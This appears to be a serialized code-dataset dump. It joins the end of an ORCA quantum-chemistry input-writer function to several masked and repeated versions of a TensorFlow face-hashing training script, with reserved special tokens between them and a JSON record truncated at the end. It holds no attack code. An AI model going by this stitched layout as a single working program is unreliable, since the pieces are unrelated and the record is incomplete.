"step-4": "import os, sys, string\nimport linecache, math\nimport numpy as np\nimport datetime , time\n\n\nfrom pople import NFC\nfrom pople import uniqatoms\nfrom pople import orca_printbas\n\n\n####### orca_run - S\ndef orca_run(method, basis,optfreq,custombasis, correlated, values, charge, multip, sym, R_coord):\n \"\"\"\n Runs orca\n\n Parameters:\n method (char) : Name of functional to be used\n basis (char) : Basis set name\n optfreq (char) : true/false value of the optfreq keyword \n custombasis (char) : true/false value of the custombasis keyword\n correlated (char) : true/false value of the correlated keyword \n values (dict): Values of the control variables \n\n \"\"\"\n with open(\"input.com\", \"w\") as com_f:\n if optfreq == \"true\":\n if values[\"verticalIP\"] != \"true\" or values[\"IPss\"] != \"true\": # IPss not defined\n if values[\"MGGA\"] == \"true\":\n Freqstr=\"NumFreq\"\n else:\n Freqstr=\"Freq\"\n \n if custombasis == \"true\":\n com_f.write(\"! \" +str(method) + \" \" + values[\"String_Opt\"] + \" \" + Freqstr + \" \\n\")\n else:\n com_f.write(\"! \" +str(method) + \" \" + str(basis) +\" \"+values[\"String_Opt\"] + \" \" + Freqstr + \" \\n\")\n else:\n if custombasis == \"true\":\n com_f.write(\"! \" +str(method) + \" \" + Freqstr + \" \\n\")\n else:\n com_f.write(\"! \" +str(method) + \" \" + str(basis) + \" \" + Freqstr + \" \\n\")\n else:\n if custombasis == \"true\":\n com_f.write(\"! \" +str(method) + \" \\n\")\n else:\n com_f.write(\"! \" +str(method) + \" \" + str(basis) + \" \\n\")\n\n Nat=len(sym)\n com_f.write(\"*xyz \"+str(charge)+\" \"+str(multip) + \"\\n\")\n for tmp in range(Nat):\n R_x=float(R_coord[tmp][0])\n R_y=float(R_coord[tmp][1])\n R_z=float(R_coord[tmp][2])\n com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\\n'.format(sym[tmp],R_x,R_y,R_z)) \n com_f.write(\"*\\n\")\n\n com_f.write(\"%MaxCore \" + values[\"maxcore_mb\"] + \"\\n\")\n com_f.write(\"%scf\\n MaxIter 500 \\n\")\n com_f.write(\" Convergence \" + values[\"conv_scf\"] + \"\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"switch_guess\"] == \"true\": ### this is not part of the inp file!!!\n if values[\"guess_TM\"] == \"true\" and values[\"G4MP2TM\"]:\n com_f.write(\" Guess = \" + values[\"option_guess\"] + \"\\n\")\n com_f.write(\"end\\n\")\n \n if values[\"switch_load_rel_file\"] == \"true\":\n f1 = open(\"rel_file.txt\", \"r\")\n com_f.write(f1.read())\n f1.close()\n with open(\"Thermochemistry.out\", \"a\") as ther_chem:\n ther_chem.write(\"check if rel_file.txt exists!!\")\n\n if values[\"SCFDIIS\"] == \"true\":\n com_f.write(\"%scf\\n DIISMaxEq 15\\n\")\n com_f.write(\" directresetfreq 1\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"LSHIFT\"] == \"true\":\n com_f.write(\"%scf\\n\")\n com_f.write(\" Shift Shift 0.1 ErrOff 0.1 end\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"SOSCF\"] == \"true\":\n com_f.write(\"%scf\\n\")\n com_f.write(\" soscfmaxit 12\\n\")\n com_f.write(\" directresetfreq 1\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"switch_DLPNO_CCSDT\"] == \"true\":\n com_f.write(\"%mdci\\n\")\n com_f.write(\" UseFullLMP2Guess true\\n\")\n com_f.write(\" TcutDOPre = \" + str(values[\"TcutDOPre\"]) +\"\\n\") #TODO Is this really needed?\n com_f.write(\"end\\n\")\n\n if ( float(values[\"Ntotale\"]) <= float(values[\"nproc\"]) ) or ( (float(values[\"Ntotale\"])-float(values[\"Ntotalecore\"])) < float(values[\"nproc\"]) ):\n com_f.write(\"%pal nprocs 1 \\n\")\n else:\n com_f.write(\"%pal nprocs \"+values[\"nproc\"]+\" \\n\")\n com_f.write(\"end\\n\")\n\n com_f.write(\"%method\\n\") ## CHECK\n com_f.write(\" IntAcc 7.0\\n\")\n \n if values[\"optdiis\"] == \"true\":\n com_f.write(\" Z_solver DIIS\\n\")\n com_f.write(\" Z_MaxIter 300\\n\")\n \n if correlated == \"true\":\n uniq_atom_res = uniqatoms(sym)\n if values[\"ALLELE\"] == \"true\": ### CHECK!!!!\n for iat in range(int(uniq_atom_res[\"N_ua\"])):\n pre1 = uniq_atom_res[\"uniq_sym\"]\n at_pr1 = pre1[iat]\n com_f.write(\" NewNCore \" + at_pr1 + \" \" + \" 0 end\\n\")\n else:\n for iat in range(int(uniq_atom_res[\"N_ua\"])):\n pre1 = uniq_atom_res[\"uniq_sym\"]\n at_pr1 = pre1[iat]\n NFC_res = NFC(at_pr1)\n com_f.write(\" NewNCore \" + at_pr1 + \" \" + str(NFC_res) +\" end\\n\")\n \n com_f.write(\"end\\n\")\n \n if optfreq == \"true\":\n com_f.write(\"%geom\\n\")\n if values[\"MGGA\"] == \"true\":\n com_f.write(\" Calc_Hess true; NumHess true\\n\")\n else:\n com_f.write(\" Calc_Hess true\\n\")\n com_f.write(\" Recalc_Hess \" + str(values[\"iterhess\"]) +\" \\n\") ## revisit !!!! CHECK!!! IMPORTANT\n com_f.write(\"end\\n\")\n com_f.write(\"%freq Temp 273.15, 298.15\\n\")\n com_f.write(\"end\\n\")\n if custombasis == \"true\":\n com_f.write(\"%basis \\n\")\n \n if custombasis == \"true\":\n uniq_atom_res = uniqatoms(sym)\n fname = basis\n if Nat == 1: \n orca_printbas(fname, sym[0]) \n else:\n for iat1 in range(int(uniq_atom_res[\"N_ua\"])):\n orca_printbas(fname, uniq_atom_res[\"uniq_sym\"][iat1]) # GTBAS1 C \n with open(\"input.com\", \"a\") as com_f:\n com_f.write(\"end\\n\")\n\n os.system(values[\"orca_exe\"] + \" input.com > input.out\")\n os.system(\"cat input.com >> ORCA.inp\")\n os.system(\"cat input.out >> ORCA.out\")\n #os.system(\"rm -f input*\")\n####### orca_run - E\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
total_iteration = 300000
m = 512
q = 32
lam = 0.01
beta = 1.0
margin = 0.5
s = 32
batch_size = 256
class_num = 1595
train_dataset = 'FS'
eval_dataset = 'LFW'
args = get_args()
image, label, iterator = {}, {}, {}
if train_dataset == 'YTF':
image['train'], label['train'], iterator['train'] = load_ytf_data(
batch_size, 'train')
elif train_dataset == 'FS':
image['train'], label['train'], iterator['train'] = load_fs_data(
batch_size, 'train')
else:
print('Select proper dataset')
wrapper = wrapper_basicImg(dataset=eval_dataset)
if eval_dataset == 'YTF':
image['gallery'], label['gallery'], iterator['gallery'
] = load_ytf_data(batch_size, 'train', eval=True)
image['test'], label['test'], iterator['test'] = load_ytf_data(
batch_size, 'test')
elif eval_dataset == 'LFW':
image['gallery'], label['gallery'], iterator['gallery'
] = load_lfw_data(batch_size, 'gallery')
image['test'], label['test'], iterator['test'] = load_lfw_data(
batch_size, 'probe')
embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],
dtype=tf.float32)
labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = 0.003
learning_rate = tf.train.exponential_decay(starter_learning_rate,
global_step, total_iteration, 0.96)
with tf.variable_scope('DIom'):
fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')
fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')
fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')
h_k = tf.reshape(fc3, [-1, m, q])
h_k = tf.nn.softmax(beta * h_k, axis=2)
index_matrix = tf.range(1, q + 1, dtype=tf.float32)
h = tf.reduce_sum(h_k * index_matrix, axis=2)
h = tf.reshape(h, [-1, m])
h_norm = tf.math.l2_normalize(h, axis=1)
l = tf.one_hot(labels, class_num)
l = tf.matmul(l, tf.transpose(l))
l_float = tf.cast(l, tf.float32)
l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))
label_int = tf.cast(tf.squeeze(l, 1), tf.int32)
inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))
cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)
theta = tf.math.acos(cos_t)
sin_t = tf.math.sin(theta)
cos_mt = tf.math.cos(theta + margin)
sin_mt = tf.math.sin(theta + margin)
logit = l * s * tf.concat([sin_t, cos_mt], 1) + (1 - l) * s * tf.concat([
sin_mt, cos_t], 1)
l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=
logit, labels=label_int)
c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)
l_ij = tf.reduce_mean(l_ij_logit)
c_ij = tf.reduce_mean(c_ij)
loss = l_ij + lam * c_ij
gradient = tf.gradients(loss, sin_t)
t_vars = tf.global_variables()
train_vars = [var for var in t_vars if 'DIom' in var.name]
opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(
loss, var_list=train_vars, global_step=global_step)
with tf.Session() as sess:
tf.global_variables_initializer().run()
sess.run(iterator['train'].initializer)
iteration = sess.run(global_step)
t_opt = [opt_t, loss, l_ij, c_ij]
start_time = time.time()
while iteration != total_iteration:
img, lbl = sess.run([image['train'], label['train']])
train_dict = {embedding_tensor: img, labels: lbl}
_, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=
train_dict)
iteration += 1
if iteration % 10000 == 0:
dist_list = []
label_list = []
code_list = []
while wrapper.samples_left > 0:
imgs, lbls = wrapper.get_next_batch(100)
imgs = np.reshape(imgs, [-1, 512])
eer_dict = {embedding_tensor: imgs}
code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)
code = np.reshape(code, [-1, 2, m])
distance = np.sum(np.prod(code, axis=1), axis=1)
if dist_list == []:
dist_list = distance
label_list = lbls
code_list = int_code
else:
dist_list = np.concatenate((dist_list, distance),
axis=0)
label_list = np.concatenate((label_list, lbls), axis=0)
code_list = np.concatenate((code_list, int_code),
axis=0)
wrapper.samples_left = np.size(wrapper.labels, axis=0)
wrapper.next_batch_pointer = 0
fpr, tpr, threshold = roc_curve(label_list, dist_list,
pos_label=1)
fnr = 1 - tpr
eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]
code_arr = np.around(code_list)
count_arr = []
for i in range(q):
count_arr.append(np.count_nonzero(code_arr == i + 1))
plt.clf()
plt.bar(range(1, q + 1), count_arr)
plt.savefig('./plt/code_' + str(iteration) + '.png')
time_taken = time.time() - start_time
MAP = 0
print(
'[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'
% (iteration, train_loss, loss_l, loss_c, MAP, eer,
time_taken))
start_time = time.time()
<|reserved_special_token_1|>
import tensorflow as tf
import numpy as np
import time
import os
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
from src.model import get_args
from src.funcs import linear
from src.youtubeface import load_ytf_data
from src.lfw import load_lfw_data
from src.facescrub import load_fs_data
from src.wrapper_basicImg import wrapper_basicImg
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
total_iteration = 300000
m = 512
q = 32
lam = 0.01
beta = 1.0
margin = 0.5
s = 32
batch_size = 256
class_num = 1595
train_dataset = 'FS'
eval_dataset = 'LFW'
args = get_args()
image, label, iterator = {}, {}, {}
if train_dataset == 'YTF':
image['train'], label['train'], iterator['train'] = load_ytf_data(
batch_size, 'train')
elif train_dataset == 'FS':
image['train'], label['train'], iterator['train'] = load_fs_data(
batch_size, 'train')
else:
print('Select proper dataset')
wrapper = wrapper_basicImg(dataset=eval_dataset)
if eval_dataset == 'YTF':
image['gallery'], label['gallery'], iterator['gallery'
] = load_ytf_data(batch_size, 'train', eval=True)
image['test'], label['test'], iterator['test'] = load_ytf_data(
batch_size, 'test')
elif eval_dataset == 'LFW':
image['gallery'], label['gallery'], iterator['gallery'
] = load_lfw_data(batch_size, 'gallery')
image['test'], label['test'], iterator['test'] = load_lfw_data(
batch_size, 'probe')
embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],
dtype=tf.float32)
labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = 0.003
learning_rate = tf.train.exponential_decay(starter_learning_rate,
global_step, total_iteration, 0.96)
with tf.variable_scope('DIom'):
fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')
fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')
fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')
h_k = tf.reshape(fc3, [-1, m, q])
h_k = tf.nn.softmax(beta * h_k, axis=2)
index_matrix = tf.range(1, q + 1, dtype=tf.float32)
h = tf.reduce_sum(h_k * index_matrix, axis=2)
h = tf.reshape(h, [-1, m])
h_norm = tf.math.l2_normalize(h, axis=1)
l = tf.one_hot(labels, class_num)
l = tf.matmul(l, tf.transpose(l))
l_float = tf.cast(l, tf.float32)
l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))
label_int = tf.cast(tf.squeeze(l, 1), tf.int32)
inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))
cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)
theta = tf.math.acos(cos_t)
sin_t = tf.math.sin(theta)
cos_mt = tf.math.cos(theta + margin)
sin_mt = tf.math.sin(theta + margin)
logit = l * s * tf.concat([sin_t, cos_mt], 1) + (1 - l) * s * tf.concat([
sin_mt, cos_t], 1)
l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=
logit, labels=label_int)
c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)
l_ij = tf.reduce_mean(l_ij_logit)
c_ij = tf.reduce_mean(c_ij)
loss = l_ij + lam * c_ij
gradient = tf.gradients(loss, sin_t)
t_vars = tf.global_variables()
train_vars = [var for var in t_vars if 'DIom' in var.name]
opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(
loss, var_list=train_vars, global_step=global_step)
with tf.Session() as sess:
tf.global_variables_initializer().run()
sess.run(iterator['train'].initializer)
iteration = sess.run(global_step)
t_opt = [opt_t, loss, l_ij, c_ij]
start_time = time.time()
while iteration != total_iteration:
img, lbl = sess.run([image['train'], label['train']])
train_dict = {embedding_tensor: img, labels: lbl}
_, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=
train_dict)
iteration += 1
if iteration % 10000 == 0:
dist_list = []
label_list = []
code_list = []
while wrapper.samples_left > 0:
imgs, lbls = wrapper.get_next_batch(100)
imgs = np.reshape(imgs, [-1, 512])
eer_dict = {embedding_tensor: imgs}
code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)
code = np.reshape(code, [-1, 2, m])
distance = np.sum(np.prod(code, axis=1), axis=1)
if dist_list == []:
dist_list = distance
label_list = lbls
code_list = int_code
else:
dist_list = np.concatenate((dist_list, distance),
axis=0)
label_list = np.concatenate((label_list, lbls), axis=0)
code_list = np.concatenate((code_list, int_code),
axis=0)
wrapper.samples_left = np.size(wrapper.labels, axis=0)
wrapper.next_batch_pointer = 0
fpr, tpr, threshold = roc_curve(label_list, dist_list,
pos_label=1)
fnr = 1 - tpr
eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]
code_arr = np.around(code_list)
count_arr = []
for i in range(q):
count_arr.append(np.count_nonzero(code_arr == i + 1))
plt.clf()
plt.bar(range(1, q + 1), count_arr)
plt.savefig('./plt/code_' + str(iteration) + '.png')
time_taken = time.time() - start_time
MAP = 0
print(
'[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'
% (iteration, train_loss, loss_l, loss_c, MAP, eer,
time_taken))
start_time = time.time()
<|reserved_special_token_1|>
import tensorflow as tf
import numpy as np
import time
import os
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
from src.model import get_args
from src.funcs import linear
from src.youtubeface import load_ytf_data
from src.lfw import load_lfw_data
from src.facescrub import load_fs_data
from src.wrapper_basicImg import wrapper_basicImg
if __name__ == '__main__':
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
total_iteration = 300000
m = 512
q = 32
lam = 0.01
beta = 1.
margin = 0.5
s = 32
batch_size = 256
class_num = 1595
train_dataset = 'FS'
eval_dataset = "LFW"
args = get_args()
### Get image and label from tfrecord
image, label, iterator = {}, {}, {}
if train_dataset == 'YTF':
image['train'], label['train'], iterator['train'] = load_ytf_data(batch_size, 'train')
elif train_dataset == 'FS':
image['train'], label['train'], iterator['train'] = load_fs_data(batch_size, 'train')
else:
print("Select proper dataset")
### Get evaluation dataset. Wrapper
wrapper = wrapper_basicImg(dataset=eval_dataset)
if eval_dataset == 'YTF':
image['gallery'], label['gallery'], iterator['gallery'] = load_ytf_data(batch_size, 'train', eval=True)
image['test'], label['test'], iterator['test'] = load_ytf_data(batch_size, 'test')
elif eval_dataset == 'LFW':
image['gallery'], label['gallery'], iterator['gallery'] = load_lfw_data(batch_size, 'gallery')
image['test'], label['test'], iterator['test'] = load_lfw_data(batch_size, 'probe')
### Backbone network (Arcface)
embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512], dtype=tf.float32)
labels = tf.placeholder(name='label', shape=[None, ], dtype=tf.int32)
### Global step & learning rate
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = 0.003
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, total_iteration, 0.96)
### My implementation (DIom algorithm)
with tf.variable_scope('DIom'):
fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')
fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')
fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')
h_k = tf.reshape(fc3, [-1, m, q])
h_k = tf.nn.softmax(beta * h_k, axis=2)
index_matrix = tf.range(1, q + 1, dtype=tf.float32)
h = tf.reduce_sum(h_k * index_matrix, axis=2)
h = tf.reshape(h, [-1, m])
h_norm = tf.math.l2_normalize(h, axis=1)
### Loss function
l = tf.one_hot(labels, class_num)
l = tf.matmul(l, tf.transpose(l))
l_float = tf.cast(l, tf.float32)
l = tf.reshape(tf.clip_by_value(l_float, 0., 1.), (-1, 1))
label_int = tf.cast(tf.squeeze(l, 1), tf.int32)
inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))
cos_t = tf.clip_by_value(inner_prod, -1., 1. - 1e-6)
theta = tf.math.acos(cos_t)
sin_t = tf.math.sin(theta)
cos_mt = tf.math.cos(theta + margin)
sin_mt = tf.math.sin(theta + margin)
logit = l * s * (tf.concat([sin_t, cos_mt], 1)) + (1 - l) * s * (tf.concat([sin_mt, cos_t], 1))
l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logit, labels=label_int)
c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)
# Baseline pairwise-CE
# label_ce = tf.cast(labels, tf.float32)
# l_ij = l * tf.log(tf.square(inner_prod)) + (1 - l) * tf.log(tf.maximum(1e-6, 1 - tf.square(inner_prod)))
# l_ij = -tf.reduce_mean(l_ij)
# My novel cosine loss
l_ij = tf.reduce_mean(l_ij_logit)
c_ij = tf.reduce_mean(c_ij)
loss = l_ij + lam * c_ij
gradient = tf.gradients(loss, sin_t)
### Optimizer
t_vars = tf.global_variables()
train_vars = [var for var in t_vars if 'DIom' in var.name]
opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(loss, var_list=train_vars, global_step=global_step)
with tf.Session() as sess:
tf.global_variables_initializer().run()
sess.run(iterator['train'].initializer)
### Training
iteration = sess.run(global_step)
t_opt = [opt_t, loss, l_ij, c_ij]
start_time = time.time()
while iteration != total_iteration:
img, lbl = sess.run([image['train'], label['train']])
train_dict = {
embedding_tensor: img,
labels: lbl
}
_, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=train_dict)
iteration += 1
if iteration % 10000 == 0:
### Evaluation after training
### Get gallery hash code
# gallery = []
# gallery_label = []
# sess.run(iterator['gallery'].initializer)
# try:
# while True:
# img, lbl = sess.run([image['gallery'], label['gallery']])
#
# gallery_dict = {
# embedding_tensor: img
# }
#
# hash_code = sess.run(h_norm, feed_dict=gallery_dict)
#
# if gallery == []:
# gallery = hash_code
# gallery_label = lbl
# else:
# gallery = np.concatenate((gallery, hash_code), axis=0)
# gallery_label = np.concatenate((gallery_label, lbl), axis=0)
#
# except tf.errors.OutOfRangeError:
# pass
#
# ### Get probe hash code
# probe = []
# probe_label = []
# code_arr = []
# sess.run(iterator['test'].initializer)
# try:
# while True:
# img, lbl = sess.run([image['test'], label['test']])
#
# gallery_dict = {
# embedding_tensor: img
# }
#
# code, hash_code = sess.run([h, h_norm], feed_dict=gallery_dict)
#
# if probe == []:
# probe = hash_code
# probe_label = lbl
# code_arr = code
# else:
# probe = np.concatenate((probe, hash_code), axis=0)
# probe_label = np.concatenate((probe_label, lbl), axis=0)
# code_arr = np.concatenate((code_arr, code), axis=0)
#
# except tf.errors.OutOfRangeError:
# pass
#
# ### Code frequency
# code_arr = np.around(code_arr)
# count_arr = []
# for i in range(q):
# count_arr.append(np.count_nonzero(code_arr == i + 1))
#
# plt.clf()
# plt.bar(range(1, q+1), count_arr)
# plt.savefig('./plt/code_' + str(iteration) + '.png')
# ### Calculate MAP
# gtp = 40
# k = 50
#
# distance = np.matmul(probe, gallery.T)
# arg_idx = np.argsort(-distance, axis=1)
#
# max_label = gallery_label[arg_idx[:, :k]]
# match_matrix = np.equal(max_label, probe_label[:,np.newaxis])
#
# tp_seen = match_matrix * np.cumsum(match_matrix, axis=1)
# ap = np.sum(tp_seen / np.arange(1, k + 1)[np.newaxis, :], axis=1) / gtp
# MAP = np.mean(ap)
### Calculate EER
dist_list = []
label_list = []
code_list = []
while wrapper.samples_left > 0:
imgs, lbls = wrapper.get_next_batch(100)
imgs = np.reshape(imgs, [-1, 512])
eer_dict = {
embedding_tensor: imgs
}
code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)
code = np.reshape(code, [-1, 2, m])
distance = np.sum(np.prod(code, axis=1), axis=1)
if dist_list == []:
dist_list = distance
label_list = lbls
code_list = int_code
else:
dist_list = np.concatenate((dist_list, distance), axis=0)
label_list = np.concatenate((label_list, lbls), axis=0)
code_list = np.concatenate((code_list, int_code), axis=0)
wrapper.samples_left= np.size(wrapper.labels, axis=0)
wrapper.next_batch_pointer = 0
fpr, tpr, threshold = roc_curve(label_list, dist_list, pos_label=1)
fnr = 1 - tpr
# eer_threshold = threshold(np.nanargmin(np.absolute((fnr - fpr))))
eer = fpr[np.nanargmin(np.absolute((fnr - fpr)))]
### Code frequency
code_arr = np.around(code_list)
count_arr = []
for i in range(q):
count_arr.append(np.count_nonzero(code_arr == i + 1))
plt.clf()
plt.bar(range(1, q + 1), count_arr)
plt.savefig('./plt/code_' + str(iteration) + '.png')
time_taken = time.time() - start_time
MAP = 0
# print("good")
print("[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f"
% (iteration, train_loss, loss_l, loss_c, MAP, eer, time_taken))
start_time = time.time()
# np.save('CP.npy', np.concatenate((fpr[np.newaxis, :], tpr[np.newaxis, :]), axis=0))
### Save model.
# save_vars = [var for var in t_vars if 'DIom' in var.name]
# saver = tf.train.Saver(var_list=save_vars)
# saver.save(sess, './model/DIom_layer')
|
flexible
|
{
"blob_id": "459dd9302f7100ad02119cc94b735b19287f21e5",
"index": 5956,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n total_iteration = 300000\n m = 512\n q = 32\n lam = 0.01\n beta = 1.0\n margin = 0.5\n s = 32\n batch_size = 256\n class_num = 1595\n train_dataset = 'FS'\n eval_dataset = 'LFW'\n args = get_args()\n image, label, iterator = {}, {}, {}\n if train_dataset == 'YTF':\n image['train'], label['train'], iterator['train'] = load_ytf_data(\n batch_size, 'train')\n elif train_dataset == 'FS':\n image['train'], label['train'], iterator['train'] = load_fs_data(\n batch_size, 'train')\n else:\n print('Select proper dataset')\n wrapper = wrapper_basicImg(dataset=eval_dataset)\n if eval_dataset == 'YTF':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_ytf_data(batch_size, 'train', eval=True)\n image['test'], label['test'], iterator['test'] = load_ytf_data(\n batch_size, 'test')\n elif eval_dataset == 'LFW':\n image['gallery'], label['gallery'], iterator['gallery'\n ] = load_lfw_data(batch_size, 'gallery')\n image['test'], label['test'], iterator['test'] = load_lfw_data(\n batch_size, 'probe')\n embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512],\n dtype=tf.float32)\n labels = tf.placeholder(name='label', shape=[None], dtype=tf.int32)\n global_step = tf.Variable(0, trainable=False)\n starter_learning_rate = 0.003\n learning_rate = tf.train.exponential_decay(starter_learning_rate,\n global_step, total_iteration, 0.96)\n with tf.variable_scope('DIom'):\n fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')\n fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')\n fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')\n h_k = tf.reshape(fc3, [-1, m, q])\n h_k = tf.nn.softmax(beta * h_k, axis=2)\n index_matrix = tf.range(1, q + 1, dtype=tf.float32)\n h = tf.reduce_sum(h_k * index_matrix, axis=2)\n h = tf.reshape(h, [-1, m])\n h_norm = tf.math.l2_normalize(h, axis=1)\n l = tf.one_hot(labels, class_num)\n l = tf.matmul(l, tf.transpose(l))\n l_float = tf.cast(l, tf.float32)\n l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))\n label_int = tf.cast(tf.squeeze(l, 1), tf.int32)\n inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))\n cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)\n theta = tf.math.acos(cos_t)\n sin_t = tf.math.sin(theta)\n cos_mt = tf.math.cos(theta + margin)\n sin_mt = tf.math.sin(theta + margin)\n logit = l * s * tf.concat([sin_t, cos_mt], 1) + (1 - l) * s * tf.concat([\n sin_mt, cos_t], 1)\n l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=\n logit, labels=label_int)\n c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)\n l_ij = tf.reduce_mean(l_ij_logit)\n c_ij = tf.reduce_mean(c_ij)\n loss = l_ij + lam * c_ij\n gradient = tf.gradients(loss, sin_t)\n t_vars = tf.global_variables()\n train_vars = [var for var in t_vars if 'DIom' in var.name]\n opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(\n loss, var_list=train_vars, global_step=global_step)\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n sess.run(iterator['train'].initializer)\n iteration = sess.run(global_step)\n t_opt = [opt_t, loss, l_ij, c_ij]\n start_time = time.time()\n while iteration != total_iteration:\n img, lbl = sess.run([image['train'], label['train']])\n train_dict = {embedding_tensor: img, labels: lbl}\n _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=\n train_dict)\n iteration += 1\n if iteration % 10000 == 0:\n dist_list = []\n label_list = []\n code_list = []\n while wrapper.samples_left > 0:\n imgs, lbls = wrapper.get_next_batch(100)\n imgs = np.reshape(imgs, [-1, 512])\n eer_dict = {embedding_tensor: imgs}\n code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)\n code = np.reshape(code, [-1, 2, m])\n distance = np.sum(np.prod(code, axis=1), axis=1)\n if dist_list == []:\n dist_list = distance\n label_list = lbls\n code_list = int_code\n else:\n dist_list = np.concatenate((dist_list, distance),\n axis=0)\n label_list = np.concatenate((label_list, lbls), axis=0)\n code_list = np.concatenate((code_list, int_code),\n axis=0)\n wrapper.samples_left = np.size(wrapper.labels, axis=0)\n wrapper.next_batch_pointer = 0\n fpr, tpr, threshold = roc_curve(label_list, dist_list,\n pos_label=1)\n fnr = 1 - tpr\n eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]\n code_arr = np.around(code_list)\n count_arr = []\n for i in range(q):\n count_arr.append(np.count_nonzero(code_arr == i + 1))\n plt.clf()\n plt.bar(range(1, q + 1), count_arr)\n plt.savefig('./plt/code_' + str(iteration) + '.png')\n time_taken = time.time() - start_time\n MAP = 0\n print(\n '[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'\n % (iteration, train_loss, loss_l, loss_c, MAP, eer,\n time_taken))\n start_time = time.time()\n",
"step-3": "import tensorflow as tf\nimport numpy as np\nimport time\nimport os\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\nfrom src.model import get_args\nfrom src.funcs import linear\nfrom src.youtubeface import load_ytf_data\nfrom src.lfw import load_lfw_data\nfrom src.facescrub import load_fs_data\nfrom src.wrapper_basicImg import wrapper_basicImg\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n total_iteration = 300000\n m = 512\n q = 32\n lam = 0.01\n beta = 1.0\n margin = 0.5\n s = 32\n batch_size = 256\n class_num = 1595\n train_dataset = 'FS'\n eval_dataset = 'LFW'\n args = get_args()\n image, label, iterator = {}, {}, {}\n if train_dataset == 'YTF':\n image['train'], label['train'], iterator['train'] = load_ytf_data(\n batch_size, 'train')\n elif train_dataset == 'FS':\n image['train'], label['train'], iterator['train'] = load_fs_data(\n batch_size, 